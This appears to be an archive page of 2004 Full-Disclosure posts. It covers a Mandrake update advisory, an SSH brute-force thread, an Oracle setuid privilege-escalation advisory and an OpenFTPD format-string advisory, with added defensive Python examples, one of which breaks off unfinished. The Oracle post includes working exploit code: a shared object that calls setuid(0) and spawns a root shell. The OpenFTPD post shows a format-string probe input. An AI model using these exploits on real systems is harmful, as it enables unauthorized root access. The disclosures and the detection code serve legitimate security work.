 82de991deefe0ed144890b5e107c7c49 10.0/RPMS/OpenOffice.org-help-zh_CN-1.1.2-3.1.100mdk.i586.rpm
 bd471a407725562c67f7d6b993fe968c 10.0/RPMS/OpenOffice.org-help-zh_TW-1.1.2-3.1.100mdk.i586.rpm
 30cbafc38454793497dcace816814589 10.0/RPMS/OpenOffice.org-l10n-ar-1.1.2-3.1.100mdk.i586.rpm
 6c1f99a64b23c335d64effc58ace1a66 10.0/RPMS/OpenOffice.org-l10n-ca-1.1.2-3.1.100mdk.i586.rpm
 f7217fbce4f4fec19c66007bf7f1c8fa 10.0/RPMS/OpenOffice.org-l10n-cs-1.1.2-3.1.100mdk.i586.rpm
 da66f567a0c95d2551385706b6322511 10.0/RPMS/OpenOffice.org-l10n-da-1.1.2-3.1.100mdk.i586.rpm
 b25c4a8a5a04dba649dbe07cb74e437c 10.0/RPMS/OpenOffice.org-l10n-de-1.1.2-3.1.100mdk.i586.rpm
 c9de8265acf394e867f9d37dab8b8e4f 10.0/RPMS/OpenOffice.org-l10n-el-1.1.2-3.1.100mdk.i586.rpm
 26d3aec1657864a5af79e6cf42ec575c 10.0/RPMS/OpenOffice.org-l10n-en-1.1.2-3.1.100mdk.i586.rpm
 306840e68f1c5554b56fcb5a78d05662 10.0/RPMS/OpenOffice.org-l10n-es-1.1.2-3.1.100mdk.i586.rpm
 d497f588850259bb25ca2a8bfb46437b 10.0/RPMS/OpenOffice.org-l10n-et-1.1.2-3.1.100mdk.i586.rpm
 d093a78f33eb0e8e9ff6e10ae6f83b4f 10.0/RPMS/OpenOffice.org-l10n-eu-1.1.2-3.1.100mdk.i586.rpm
 092efa049db70abadaa2eb2780d29d13 10.0/RPMS/OpenOffice.org-l10n-fi-1.1.2-3.1.100mdk.i586.rpm
 e57acc32c3fe720cd5643bb9e1bee835 10.0/RPMS/OpenOffice.org-l10n-fr-1.1.2-3.1.100mdk.i586.rpm
 061f19572d6f588b2da57b32954f4960 10.0/RPMS/OpenOffice.org-l10n-it-1.1.2-3.1.100mdk.i586.rpm
 7db9ae970b0cd452cb052743172a9985 10.0/RPMS/OpenOffice.org-l10n-ja-1.1.2-3.1.100mdk.i586.rpm
 2c39709ba4dbbbdf592d3331c4f9b236 10.0/RPMS/OpenOffice.org-l10n-ko-1.1.2-3.1.100mdk.i586.rpm
 cecb56a830fa676b1e9e27ece5c39271 10.0/RPMS/OpenOffice.org-l10n-nl-1.1.2-3.1.100mdk.i586.rpm
 ead058a94cc6f3e86d58aac7235f6782 10.0/RPMS/OpenOffice.org-l10n-pl-1.1.2-3.1.100mdk.i586.rpm
 e290451530d4bf28cca0977cb0388d18 10.0/RPMS/OpenOffice.org-l10n-pt-1.1.2-3.1.100mdk.i586.rpm
 c2d58b04563e54556780f387953edc6e 10.0/RPMS/OpenOffice.org-l10n-pt_BR-1.1.2-3.1.100mdk.i586.rpm
 1dc89fbb3e79f4f3a41da6665ae9e19b 10.0/RPMS/OpenOffice.org-l10n-ru-1.1.2-3.1.100mdk.i586.rpm
 308e28b58b5ee72f84d8fc3c24f4c2dd 10.0/RPMS/OpenOffice.org-l10n-sk-1.1.2-3.1.100mdk.i586.rpm
 fe1419e7a3b301d28046e6d64d30f724 10.0/RPMS/OpenOffice.org-l10n-sv-1.1.2-3.1.100mdk.i586.rpm
 144a6daad887f537fbe1954d8f3de6b2 10.0/RPMS/OpenOffice.org-l10n-tr-1.1.2-3.1.100mdk.i586.rpm
 ba8e3f3119d89fa4f727f3e8d002cdec 10.0/RPMS/OpenOffice.org-l10n-zh_CN-1.1.2-3.1.100mdk.i586.rpm
 f43ae55a73eff7fadce5d5fc5ec6523b 10.0/RPMS/OpenOffice.org-l10n-zh_TW-1.1.2-3.1.100mdk.i586.rpm
 e495846523f861eefe787ae47dd79943 10.0/RPMS/OpenOffice.org-libs-1.1.2-3.1.100mdk.i586.rpm
 97ad227fa4a2b76e8cca7c73127c5b7a 10.0/SRPMS/OpenOffice.org-1.1.2-3.1.100mdk.src.rpm

 Mandrakelinux 10.0/AMD64:
 bdd8d8a8b6af463df910a7cde025b734 amd64/10.0/RPMS/OpenOffice.org-1.1.2-3.1.100mdk.i586.rpm
 51c8887de72b7ac39c85062b35d260e6 amd64/10.0/RPMS/OpenOffice.org-help-cs-1.1.2-3.1.100mdk.i586.rpm
 1be3655a3870f3a62608df7e864afe9e amd64/10.0/RPMS/OpenOffice.org-help-de-1.1.2-3.1.100mdk.i586.rpm
 0e01d4df1bd94eb1937b4875af700056 amd64/10.0/RPMS/OpenOffice.org-help-en-1.1.2-3.1.100mdk.i586.rpm
 5f00be2536c9e8b3a836275b96ab753b amd64/10.0/RPMS/OpenOffice.org-help-es-1.1.2-3.1.100mdk.i586.rpm
 e90125b24f99f099704d60018e339b8d amd64/10.0/RPMS/OpenOffice.org-help-eu-1.1.2-3.1.100mdk.i586.rpm
 836aec6915d5ceecc20c3e034e19e336 amd64/10.0/RPMS/OpenOffice.org-help-fi-1.1.2-3.1.100mdk.i586.rpm
 20b5190e2b683783aab65d883468074e amd64/10.0/RPMS/OpenOffice.org-help-fr-1.1.2-3.1.100mdk.i586.rpm
 4f7ef1c9b8251e96ce140463eaf28310 amd64/10.0/RPMS/OpenOffice.org-help-it-1.1.2-3.1.100mdk.i586.rpm
 7b5f6d5701e9f290d34ab7a4ada25fc1 amd64/10.0/RPMS/OpenOffice.org-help-ja-1.1.2-3.1.100mdk.i586.rpm
 d70298c769ce7dd2596d640a0c644cc9 amd64/10.0/RPMS/OpenOffice.org-help-ko-1.1.2-3.1.100mdk.i586.rpm
 ed06265ba967349b8a28420e5ff56ae8 amd64/10.0/RPMS/OpenOffice.org-help-nl-1.1.2-3.1.100mdk.i586.rpm
 b6c34d066a2addb975837dba16ffe9c7 amd64/10.0/RPMS/OpenOffice.org-help-ru-1.1.2-3.1.100mdk.i586.rpm
 c2dfd07ac968d38a0c6c59828f984850 amd64/10.0/RPMS/OpenOffice.org-help-sk-1.1.2-3.1.100mdk.i586.rpm
 6dbf67fa908bb9a90dfcc0aa7fe43c93 amd64/10.0/RPMS/OpenOffice.org-help-sv-1.1.2-3.1.100mdk.i586.rpm
 82de991deefe0ed144890b5e107c7c49 amd64/10.0/RPMS/OpenOffice.org-help-zh_CN-1.1.2-3.1.100mdk.i586.rpm
 bd471a407725562c67f7d6b993fe968c amd64/10.0/RPMS/OpenOffice.org-help-zh_TW-1.1.2-3.1.100mdk.i586.rpm
 30cbafc38454793497dcace816814589 amd64/10.0/RPMS/OpenOffice.org-l10n-ar-1.1.2-3.1.100mdk.i586.rpm
 6c1f99a64b23c335d64effc58ace1a66 amd64/10.0/RPMS/OpenOffice.org-l10n-ca-1.1.2-3.1.100mdk.i586.rpm
 f7217fbce4f4fec19c66007bf7f1c8fa amd64/10.0/RPMS/OpenOffice.org-l10n-cs-1.1.2-3.1.100mdk.i586.rpm
 da66f567a0c95d2551385706b6322511 amd64/10.0/RPMS/OpenOffice.org-l10n-da-1.1.2-3.1.100mdk.i586.rpm
 b25c4a8a5a04dba649dbe07cb74e437c amd64/10.0/RPMS/OpenOffice.org-l10n-de-1.1.2-3.1.100mdk.i586.rpm
 c9de8265acf394e867f9d37dab8b8e4f amd64/10.0/RPMS/OpenOffice.org-l10n-el-1.1.2-3.1.100mdk.i586.rpm
 26d3aec1657864a5af79e6cf42ec575c amd64/10.0/RPMS/OpenOffice.org-l10n-en-1.1.2-3.1.100mdk.i586.rpm
 306840e68f1c5554b56fcb5a78d05662 amd64/10.0/RPMS/OpenOffice.org-l10n-es-1.1.2-3.1.100mdk.i586.rpm
 d497f588850259bb25ca2a8bfb46437b amd64/10.0/RPMS/OpenOffice.org-l10n-et-1.1.2-3.1.100mdk.i586.rpm
 d093a78f33eb0e8e9ff6e10ae6f83b4f amd64/10.0/RPMS/OpenOffice.org-l10n-eu-1.1.2-3.1.100mdk.i586.rpm
 092efa049db70abadaa2eb2780d29d13 amd64/10.0/RPMS/OpenOffice.org-l10n-fi-1.1.2-3.1.100mdk.i586.rpm
 e57acc32c3fe720cd5643bb9e1bee835 amd64/10.0/RPMS/OpenOffice.org-l10n-fr-1.1.2-3.1.100mdk.i586.rpm
 061f19572d6f588b2da57b32954f4960 amd64/10.0/RPMS/OpenOffice.org-l10n-it-1.1.2-3.1.100mdk.i586.rpm
 7db9ae970b0cd452cb052743172a9985 amd64/10.0/RPMS/OpenOffice.org-l10n-ja-1.1.2-3.1.100mdk.i586.rpm
 2c39709ba4dbbbdf592d3331c4f9b236 amd64/10.0/RPMS/OpenOffice.org-l10n-ko-1.1.2-3.1.100mdk.i586.rpm
 cecb56a830fa676b1e9e27ece5c39271 amd64/10.0/RPMS/OpenOffice.org-l10n-nl-1.1.2-3.1.100mdk.i586.rpm
 ead058a94cc6f3e86d58aac7235f6782 amd64/10.0/RPMS/OpenOffice.org-l10n-pl-1.1.2-3.1.100mdk.i586.rpm
 e290451530d4bf28cca0977cb0388d18 amd64/10.0/RPMS/OpenOffice.org-l10n-pt-1.1.2-3.1.100mdk.i586.rpm
 c2d58b04563e54556780f387953edc6e amd64/10.0/RPMS/OpenOffice.org-l10n-pt_BR-1.1.2-3.1.100mdk.i586.rpm
 1dc89fbb3e79f4f3a41da6665ae9e19b amd64/10.0/RPMS/OpenOffice.org-l10n-ru-1.1.2-3.1.100mdk.i586.rpm
 308e28b58b5ee72f84d8fc3c24f4c2dd amd64/10.0/RPMS/OpenOffice.org-l10n-sk-1.1.2-3.1.100mdk.i586.rpm
 fe1419e7a3b301d28046e6d64d30f724 amd64/10.0/RPMS/OpenOffice.org-l10n-sv-1.1.2-3.1.100mdk.i586.rpm
 144a6daad887f537fbe1954d8f3de6b2 amd64/10.0/RPMS/OpenOffice.org-l10n-tr-1.1.2-3.1.100mdk.i586.rpm
 ba8e3f3119d89fa4f727f3e8d002cdec amd64/10.0/RPMS/OpenOffice.org-l10n-zh_CN-1.1.2-3.1.100mdk.i586.rpm
 f43ae55a73eff7fadce5d5fc5ec6523b amd64/10.0/RPMS/OpenOffice.org-l10n-zh_TW-1.1.2-3.1.100mdk.i586.rpm
 e495846523f861eefe787ae47dd79943 amd64/10.0/RPMS/OpenOffice.org-libs-1.1.2-3.1.100mdk.i586.rpm
 97ad227fa4a2b76e8cca7c73127c5b7a amd64/10.0/SRPMS/OpenOffice.org-1.1.2-3.1.100mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrakeUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandrakesoft for security. You can obtain
 the GPG public key of the Mandrakelinux Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandrakelinux at:

  http://www.mandrakesoft.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

 Type Bits/KeyID Date User ID
 pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  <security linux-mandrake.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFBCd4/mqjQ0CJFipgRApq6AJ0XrRU2e5s+pbpQ89g6MUpz5xxgOwCgppkV
BOFa4EeuYkLdIja3Dd81kPs=
=4dco
-----END PGP SIGNATURE-----



 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

From: Jan Muenther (jan.muenthernruns.com)
Date: Fri Jul 30 2004 - 02:35:58 CDT


Howdy,

> Highly doubtful. It's easy enough to test though - just use the tool
> to poke another machine under your control, and use tcpdump or ethereal
> to capture all the traffic (don't forget '-s 1500' or similar for tcpdump
> to get the *whole* packet).

Sidenote - '-s 0' always adjusts capture length to the MTU, allowing for a full
capture of the entire payload.

If the binary's made available, I'll throw it into IDA and see what it does.

Cheers, J.



 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

From: Stefan Janecek (stefan.janecekjku.at)
Date: Fri Jul 30 2004 - 04:38:53 CDT


On Thu, 2004-07-29 at 19:52, dmargolistwing.org wrote:
> Stefan Janecek wrote:
>
> > This does not seem to be a stupid brute force attack, as there is only
> > one login attempt per user. Could it be that the tool tries to exploit
> > some vulnerability in the sshd, and just tries to look harmless by using
> > 'test' and 'guest' as usernames?
> >
> > The compromised machine was running an old debian woody installation
> > which had not been upgraded for at least one year, the sshd version
> > string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
>
> Does the Debian machine that was compromised have a ``test'' or
> ``guest'' username?

No.

>
> Also, if it wasn't patched in a year, it may still be vulnerable to
> this: http://www.cert.org/advisories/CA-2003-24.html

Thanks, I'll have a look at it.

>
> I would tend to think this isn't a 0day kinda vuln, as if it were, he'd
> be a lot more successful than he seems (unless we're all rooted and
> don't even know it). But who can tell?
>

Yes, agreed - I am also convinced it must be something old, and
shouldn't be dangerous for reasonably administered machines.



 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Christian Fromme (derfrommegmx.de)
Date: Thu Jul 29 2004 - 18:59:03 CDT


Ali Campbell <fdisclosurealicampbell.org.uk> wrote:

> Do I take it that these things are just trying to log in using some
> guessed password(s) ? Out of interest, do we have any idea what these
> opportunistic passwords might be ?

As far as I have heard this is a 0day "exploit" which does nothing but
try to brute-force some accounts like "admin", "test" and so on with
passwords like "test", "1234" and I don't know what.
Seems to be not too serious because no one actually has those accounts in
real life. ;)

Best wishes,
Christian

--
Christian Fromme

chris at kaner.shacknet.nu
PGP-Pubkey: http://www.informatik.fh-wiesbaden.de/~cfrom001/pgp/index.html



 
[Fwd: Re: [Full-Disclosure] Re: Automated SSH login attempts?]

From: Stefan Janecek (stefan.janecekjku.at)
Date: Fri Jul 30 2004 - 05:14:30 CDT


uuups - forgot to cc the list on this one. sorry.

-----Forwarded Message-----
From: Stefan Janecek <stefan.janecekjku.at>
To: Valdis.Kletnieksvt.edu
Subject: Re: [Full-Disclosure] Re: Automated SSH login attempts?
Date: Fri, 30 Jul 2004 11:45:51 +0200

On Thu, 2004-07-29 at 21:35, Valdis.Kletnieksvt.edu wrote:
> On Thu, 29 Jul 2004 18:38:15 +0200, Stefan Janecek <stefan.janecekjku.at> said:
> >
> > This does not seem to be a stupid brute force attack, as there is only
> > one login attempt per user. Could it be that the tool tries to exploit
> > some vulnerability in the sshd, and just tries to look harmless by using
> > 'test' and 'guest' as usernames?
>
> Highly doubtful. It's easy enough to test though - just use the tool
> to poke another machine under your control, and use tcpdump or ethereal
> to capture all the traffic (don't forget '-s 1500' or similar for tcpdump
> to get the *whole* packet). Then somebody familiar with the SSH
> protocol can go through it byte by byte and look for anything odd.
>
> I don't expect we'll find anything, unless it's some very hard to trigger hole
> on some odd architecture. Remember - with all of these probes, we're only
> seeing a very few boxes actually get 0wned. More likely, script kiddies have
> re-discovered the concept that if there's 500 million boxes online, enough of
> them are administered by clueless people that they can snarf shells using a
> default userid/password pair.....
>

This is exactly what I did. The tool tries to login as users 'test' and
'guest'. But I don't think it is about just snarfing passwords, because
those users did not exist on the compromised machine - yet they got in.

My personal feeling is (given their poor success) that they are using
some old-fart ssh vulnerability. The compromised machine had an uptime
of 254 days if I remember correctly, and was hardly used during this
time, nor has it been updated. Still I would really like to know
*exactly* what they are doing, just to make sure...

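One way to spot the pattern Stefan describes (a single attempt against each of a few guessable accounts from one source) in sshd's auth log, added here as an example and not code from any poster in this thread. The log lines are constructed in OpenSSH's syslog format; the account list combines the names reported in the thread (test, guest) with the ones posters guessed would be tried (root, admin).

```python
"""Flag sources that probe a fixed set of guessable accounts, one attempt each.

Added example for the thread above; not code from any list poster.
"""
import re
from collections import defaultdict

# Constructed sample: 192.0.2.10 tries 'test' and 'guest' once each (the
# behaviour described in the thread); 198.51.100.7 is an admin who mistyped
# the root password once and then got in.
SAMPLE_AUTH_LOG = """\
Jul 30 02:35:58 woody sshd[2171]: Invalid user test from 192.0.2.10
Jul 30 02:35:58 woody sshd[2171]: Failed password for invalid user test from 192.0.2.10 port 4321 ssh2
Jul 30 02:36:02 woody sshd[2174]: Invalid user guest from 192.0.2.10
Jul 30 02:36:02 woody sshd[2174]: Failed password for invalid user guest from 192.0.2.10 port 4322 ssh2
Jul 30 02:40:11 woody sshd[2180]: Failed password for root from 198.51.100.7 port 5123 ssh2
Jul 30 02:40:15 woody sshd[2180]: Accepted password for root from 198.51.100.7 port 5123 ssh2
"""

# Names the thread reports being tried plus the ones posters expect on the list.
PROBE_ACCOUNTS = frozenset({"test", "guest", "admin", "root"})

# Matches "Invalid user X from IP" and "Failed password for [invalid user] X from IP".
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed password for(?: invalid user)?) "
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)


def parse_attempts(log_text):
    """Return {source_ip: set of usernames} for failed or invalid-user attempts."""
    attempts = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            attempts[m.group("ip")].add(m.group("user"))
    return attempts


def find_probe_sources(log_text, min_accounts=2):
    """Sources that tried at least min_accounts distinct names from PROBE_ACCOUNTS.

    Counting distinct account names per source, rather than failures per
    account, is what catches the one-attempt-per-user behaviour from the
    thread; a plain failed-login threshold per account never fires on it.
    """
    attempts = parse_attempts(log_text)
    return sorted(ip for ip, users in attempts.items()
                  if len(users & PROBE_ACCOUNTS) >= min_accounts)


if __name__ == "__main__":
    for ip in find_probe_sources(SAMPLE_AUTH_LOG):
        print("probable account-guessing probe from", ip)
```

The admin's single failure is not reported because only one probe name was involved; lowering min_accounts to 1 turns the check into an ordinary "any failure on a known probe account" alert.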


 
[Full-Disclosure] OPEN3S - Local Privilege Elevation through Oracle products (Unix Platform)

From: Juan Manuel Pascual (jmpascualopen3s.com)
Date: Fri Jul 30 2004 - 04:28:39 CDT


*----------========== OPEN3S-2004-10-05-eng-oracle-so-libraries ==========----------*

* Title:* Local Vulnerability in Oracle Products. RDBMS, IAs, etc
           *All Versions*. (10g not tested)
* Date:* 10-05-2004
* Platform:* Tested in Linux, Solaris & HP-UX but can be exported to others.
* Impact:* Privilege elevation from oracle products installation owner
           (usually called oracle or ias ) to root.
* Author:* Juan Manuel Pascual Escriba <mailto:jmpascualopen3s.com>
* Status:* Vendor contacted details below.

*INTRODUCTION:*

Oracle Corporation (nasdaqNM - ORCL) is a world-leading database software developer,
claiming to develop unbreakable software. Its products target the database,
application server and data mining markets.

*PROBLEM SUMMARY:*

The following software versions
        - Oracle 8i Linux Platform
        - Oracle 9i Linux Platform
        - Oracle 8i HP-UX Platform
        - Oracle 9i Solaris Platform
        - Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3
        - All versions tested in Unix platform (Universal?¿)

are susceptible to privilege elevation from the oracle software owner (normally oracle, ias,
iasr2) to root.

*DESCRIPTION*

Oracle libraries are installed owned by the oracle user in a default installation of the
products listed above.

[paskdimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 lbs
drwxr-xr-x 15 iasr2 dba 512 Jan 7 12:13 ldap
drwxr-xr-x 3 iasr2 dba 12800 Nov 21 11:22 lib
drwxr-xr-x 13 iasr2 dba 512 Nov 21 14:04 network
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 ocommon
...

As you can see, the lib directory is owned by iasr2; now let's look for some setuid binaries.

[paskdimoniet ora9ias_mid]$ find ./ -perm +4000
./bin/dbsnmp
./bin/nmo

[iasr2dimoniet ora9ias_mid]$ ls -alc ./bin/dbsnmp
-rwsr-s--- 1 root dba 2900980 Nov 21 14:04 ./bin/dbsnmp
[iasr2dimoniet ora9ias_mid]$ ls -alc ./bin/nmo
-rwsr-s--- 1 root dba 12632 Nov 21 14:04 ./bin/nmo

And now let's look at the shared objects the binaries depend on.

[iasr2dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
        libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
        libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
        libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
        libthread.so.1 => /usr/lib/libthread.so.1
        libkstat.so.1 => /usr/lib/libkstat.so.1
        ....

[iasr2dimoniet ora9ias_mid]$ ldd ./bin/nmo
        libnsl.so.1 => /usr/lib/libnsl.so.1
        libsocket.so.1 => /usr/lib/libsocket.so.1
        libgen.so.1 => /usr/lib/libgen.so.1
        .....

Oops, it's not possible to achieve root privileges with this binary this way (nmo only loads system libraries).

For the iasr2 user it is easy to create a shared object, something like:

#include <stdio.h>   /* header names were lost in archiving; stdio.h, stdlib.h and unistd.h are reconstructed from the calls below */
#include <stdlib.h>
#include <unistd.h>

/* _init() runs when the shared object is loaded, here by the setuid-root binary */
void _init() {
   printf("en el _init()\n");
   printf("Con PID=%i y EUID=%i",getpid(),getuid());
   setuid(0);
   system("/usr/bin/ksh");
   printf("Saliendo del Init()\n");
}

        
*IMPACT*
        
        oracle, ias, iasr2 or iasdb users with local access can gain root privileges through
        the oracle installation.

*EXPLOIT*

        commented above.

*WORKAROUND*

        chown the lib directory and its parent directory to root.

*STATUS*

        Oracle Security Alerts explains in an email sent 26/07/2004 that "Oracle believes that
        only trusted users should have access to the local iasdb user account".

        I have no information about a patch or a solution from Oracle Corp.

--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba jmpascualopen3s.com
Barcelona - Denia - Spain http://www.open3s.com

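An audit for the condition the advisory describes (a setuid-root binary whose shared libraries live under a directory the installation owner controls), added here as an example and not OPEN3S's or Oracle's code. It parses `ldd` output, then checks each resolved library and every directory above it for non-root ownership or group/other write permission. The ldd lines embedded below are the ones shown above for dbsnmp; the ownership table is constructed to mirror the directory listing in the advisory, with uid 1001 assumed for iasr2.

```python
"""Check a setuid-root binary's library dependencies for non-root-controlled paths.

Added example for the advisory above; not OPEN3S's or Oracle's code.
"""
import os
import re
import stat
import subprocess

# "libfoo.so => /path/libfoo.so (0x...)" -> the resolved path
LDD_RE = re.compile(r"^\s*\S+ => (/\S+)")


def parse_ldd(text):
    """Resolved library paths from ldd output (unresolved/vdso entries are skipped)."""
    return [m.group(1) for m in (LDD_RE.match(l) for l in text.splitlines()) if m]


def path_risk(path, uid, mode):
    """Why a path loaded by a setuid-root program is dangerous, or None if it is not.

    A library, or any directory on the way to it, that a non-root user owns or
    can write lets that user substitute code that runs as root.
    """
    if uid != 0:
        return f"{path} owned by uid {uid}, not root"
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return f"{path} writable by group/other (mode {oct(mode & 0o777)})"
    return None


def audit_libs(lib_paths, lookup):
    """lookup(path) -> (uid, mode). Checks each library and every ancestor directory once."""
    findings, seen = [], set()
    for lib in lib_paths:
        p = lib
        while p not in seen:
            seen.add(p)
            uid, mode = lookup(p)
            reason = path_risk(p, uid, mode)
            if reason:
                findings.append(reason)
            parent = os.path.dirname(p)
            if parent == p:          # reached "/"
                break
            p = parent
    return findings


def live_lookup(path):
    st = os.stat(path)
    return st.st_uid, st.st_mode


def audit_binary(binary):
    """Run the real ldd on a binary you trust and audit what it resolves."""
    out = subprocess.run(["ldd", binary], capture_output=True, text=True, check=True).stdout
    return audit_libs(parse_ldd(out), live_lookup)


# ldd output for dbsnmp as quoted in the advisory
DBSNMP_LDD = """\
        libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
        libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
        libthread.so.1 => /usr/lib/libthread.so.1
"""

# Constructed ownership table mirroring the advisory's listing: ORACLE_HOME and
# its lib directory belong to iasr2 (uid 1001 assumed), modes as shown (755/644).
OWNERSHIP = {
    "/": (0, 0o755), "/export": (0, 0o755), "/export/home": (0, 0o755),
    "/export/home/iasr2": (1001, 0o755),
    "/export/home/iasr2/ora9ias_mid": (1001, 0o755),
    "/export/home/iasr2/ora9ias_mid/lib": (1001, 0o755),
    "/export/home/iasr2/ora9ias_mid/lib/libvppdc.so": (1001, 0o644),
    "/export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0": (1001, 0o644),
    "/usr": (0, 0o755), "/usr/lib": (0, 0o755), "/usr/lib/libthread.so.1": (0, 0o755),
}


def audit_sample():
    return audit_libs(parse_ldd(DBSNMP_LDD), lambda p: OWNERSHIP[p])


if __name__ == "__main__":
    for finding in audit_sample():
        print(finding)
```

audit_binary() runs the real ldd, and ldd may hand the binary to its loader, so point it only at binaries you trust (or feed parse_ldd the output of `objdump -p`/`readelf -d` plus your own path resolution). The walk flags the library files as well as the directories, so after the advisory's chown of the lib directory and its parent the libraries under it must be root-owned too before the audit comes back clean.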


 
[Full-Disclosure] [VSA0402] OpenFTPD format string vulnerability

From: VOID.AT Security (crewvoid.at)
Date: Fri Jul 30 2004 - 05:55:07 CDT


[VSA0402 - openftpd - void.at security notice]

Overview
========

We have discovered a format string vulnerability in openftpd
(http://www.openftpd.org:9673/openftpd). OpenFTPD is a free,
open source FTP server implementation for the UNIX platform.
FTP4ALL is not vulnerable (it doesn't use that message system).

Affected Versions
=================

This affects openftpd versions up to 0.30.2, including
the old version 0.29.4.

Impact
======

Medium.
Remote shell access when you have a working FTP user account.

Workaround:
===========

Apply the following patch or upgrade to the latest CVS version.

cat > openftpd_formatstring.patch << _EOF_
--- openftpd-daily.orig/src/misc/msg.c 2004-07-05 22:02:43.000000000 +0200
+++ openftpd-daily/src/misc/msg.c 2004-07-13 18:05:01.000000000 +0200
-319,7 +319,7
    while (fgets(buff, 67, file)) {
       if (*(buff+strlen(buff)-1) == '\n') *(buff+strlen(buff)-1) = 0;
       sprintf(str, " !C| !0%-66s !C|!0\n", buff);
- printf(str);
+ printf("%s", str);
    }
    fclose(file);
    printf("!C \\__________________________________________________!Hend of message!C__/!0\n");
_EOF_
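Review bot: The hunk header line reads `-319,7 +319,7` without its `@@` delimiters, so `patch` will reject this file as pasted; it needs to be `@@ -319,7 +319,7 @@` before the patch is applied. The `printf("%s", str)` replacement does close the format-string hole, since message text no longer reaches printf as the format argument, but the context line `sprintf(str, " !C| !0%-66s !C|!0\n", buff);` writes 80 characters plus the terminator for the at-most-66-character `buff` that `fgets(buff, 67, file)` produces, and the size of `str` is not visible in the hunk; confirm it is at least 81 bytes, or change that call to `snprintf(str, sizeof str, ...)` in the same patch.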

Details
=======

When a user sends a message to another user, an external program (msg)
is called; it handles OpenFTPD's message system.

andihoagie:~$ ncftp
...
...
ncftp / > site msg purge
All the messages in trash box purged.
ncftp / > site msg send andi "AAAA%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x]"
Message sent to andi.
ncftp / > site msg read

.________________________________________________________________________.
  | Message sent from: andi Tue 13/07/2004 18:28:46 |
  | |
  | AAAA0804c1e5|5e8457e0|2b379fc0|00000000|5e84572c|5e84568c|fbad8001|43212020|3021207c|41414141] |
   \__________________________________________________end of message__/
Messages moved to archive box.
...
...

Let's have a look at the source code:

[openftpd-daily/src/misc/msg.c, function cat_message()]
...
   while (fgets(buff, 67, file)) {
      if (*(buff+strlen(buff)-1) == '\n') *(buff+strlen(buff)-1) = 0;
      sprintf(str, " !C| !0%-66s !C|!0\n", buff);
      printf(str);
   }
...

Timeline
========

2004-04-02: Bug discovered
2004-07-14: Vendor notified (primemovr)
2004-07-16: Patch for format string bug
2004-07-22: public release

Discovered by
=============

Thomas Wana <greuffvoid.at>

Further research by
===================

Andi <andivoid.at>

Credits
=======

void.at

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBCikJp97BNrByI3oRAjtqAJ93iT5HtJvxcDOBjcZ/1RvGtof2SQCeIV7+
Thl6yy0Z84ow+hiKOHIcC6A=
=fjmj
-----END PGP SIGNATURE-----

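A small static check for the bug class fixed above, added here as an example and not OpenFTPD's or void.at's code: it flags printf-family calls whose format argument is not a string literal, which is exactly the `printf(str)` in cat_message(). The sample source is the excerpt quoted above with the patched line appended, so the check is seen both firing on the vulnerable call and staying quiet on the corrected one.

```python
"""Flag printf-family calls whose format argument is not a string literal.

Added example for the advisory above; not OpenFTPD's or void.at's code.
"""
import re

# 0-based position of the format argument for each function checked.
FORMAT_ARG_INDEX = {
    "printf": 0, "vprintf": 0, "syslog": 1,
    "fprintf": 1, "sprintf": 1, "snprintf": 2,
}

CALL_RE = re.compile(r"\b(" + "|".join(FORMAT_ARG_INDEX) + r")\s*\(")


def split_args(text):
    """Split a call's argument list at top-level commas, honouring nesting and strings.

    Returns (args, index of the closing parenthesis or len(text) if unterminated).
    """
    depth, start, args, in_str = 0, 0, [], False
    i = 0
    while i < len(text):
        c = text[i]
        if in_str:
            if c == "\\":
                i += 1            # skip the escaped character
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
        elif c in "([":
            depth += 1
        elif c in ")]":
            if depth == 0:
                args.append(text[start:i].strip())
                return args, i
            depth -= 1
        elif c == "," and depth == 0:
            args.append(text[start:i].strip())
            start = i + 1
        i += 1
    return args, len(text)


def find_nonliteral_formats(source):
    """Return [(line_no, function, format_expression)] for suspicious calls."""
    findings = []
    for n, line in enumerate(source.splitlines(), 1):
        for m in CALL_RE.finditer(line):
            func = m.group(1)
            args, _ = split_args(line[m.end():])
            idx = FORMAT_ARG_INDEX[func]
            if len(args) > idx and not args[idx].startswith('"'):
                findings.append((n, func, args[idx]))
    return findings


# The cat_message() excerpt quoted in the advisory, plus the patched call on line 5.
SAMPLE_C = r'''   while (fgets(buff, 67, file)) {
      if (*(buff+strlen(buff)-1) == '\n') *(buff+strlen(buff)-1) = 0;
      sprintf(str, " !C| !0%-66s !C|!0\n", buff);
      printf(str);
      printf("%s", str);
   }
'''

if __name__ == "__main__":
    for line_no, func, fmt in find_nonliteral_formats(SAMPLE_C):
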